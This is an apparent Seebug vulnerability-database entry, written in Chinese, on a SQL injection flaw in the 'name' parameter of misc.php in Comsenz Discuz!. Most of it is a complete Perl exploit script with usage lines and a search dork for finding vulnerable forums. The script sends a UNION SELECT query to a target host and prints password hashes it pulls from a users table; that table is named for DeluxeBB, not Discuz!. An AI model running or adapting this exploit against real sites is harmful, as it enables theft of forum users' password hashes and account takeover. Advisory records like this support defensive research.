Discuz! 'name'参数SQL注入漏洞

2010-01-06T00:00:00
ID SSV:15193
Type seebug
Reporter Root
Modified 2010-01-06T00:00:00

Description

Bugraq ID: 37556

Comsenz Discuz!是一款流行的论坛程序。 Comsenz Discuz!存在输入验证错误,远程攻击者可以利用漏洞进行SQL注入攻击,获得密码HASH等敏感信息。 问题是'misc.php'脚本对'name'参数缺少过滤,构建恶意SQL查询作为参数数据,可更改原来的SQL逻辑,获得敏感信息或操作数据库。

Comsenz Discuz! 7.x 目前没有解决方案提供: http://www.discuz.com/

                                        
                                            
                                                #!/usr/bin/perl
  
use IO::Socket;
  
  
print q{
######################################################
#    Discuz  Remote SQL Injection Exploit            #
#    By indoushka                                    #
#    www.iq-ty.com                                   #
#    Souk Naamane  (00213771818860)                  #
#    Algeria Hackerz   (indoushka@hotmail.com)       #
# Dork:Powered by Discuz! 1.0 © 2002,Crossday Studio #           
######################################################
};
  
if (!$ARGV[2]) {
  
print q{
    Usage: perl  Discuz.pl host /directory/ victim_userid
  
       perl  Discuz.pl www.Discuz.com /forum/ 1
  
  
};
  
}
  
  
$server = $ARGV[0];
$dir    = $ARGV[1];
$user   = $ARGV[2];
$myuser = $ARGV[3];
$mypass = $ARGV[4];
$myid   = $ARGV[5];
  
print "------------------------------------------------------------------------------------------------\r\n";
print "[>] SERVER: $server\r\n";
print "[>]    DIR: $dir\r\n";
print "[>] USERID: $user\r\n";
print "------------------------------------------------------------------------------------------------\r\n\r\n";
  
$server =~ s/(http:\/\/)//eg;
  
$path  = $dir;
$path .= "misc.php?sub=profile&name=0')+UNION+SELECT+0,pass,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+FROM%20deluxebb_users%20WHERE%20(uid= '".$user ;
  
  
print "[~] PREPARE TO CONNECT...\r\n";
  
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80") || die "[-] CONNECTION FAILED";
  
print "[+] CONNECTED\r\n";
print "[~] SENDING QUERY...\r\n";
print $socket "GET $path HTTP/1.1\r\n";
print $socket "Host: $server\r\n";
print $socket "Accept: */*\r\n";
print $socket "Connection: close\r\n\r\n";
print "[+] DONE!\r\n\r\n";
  
  
  
print "--[ REPORT ]------------------------------------------------------------------------------------\r\n";
while ($answer = <$socket>)
{
  
 if ($answer =~/(\w{32})/)
{
  
  if ($1 ne 0) {
   print "Password Hash is: ".$1."\r\n";
print "--------------------------------------------------------------------------------------\r\n";
  
      }
exit();
}
  
}
print "------------------------------------------------------------------------------------------------\r\n";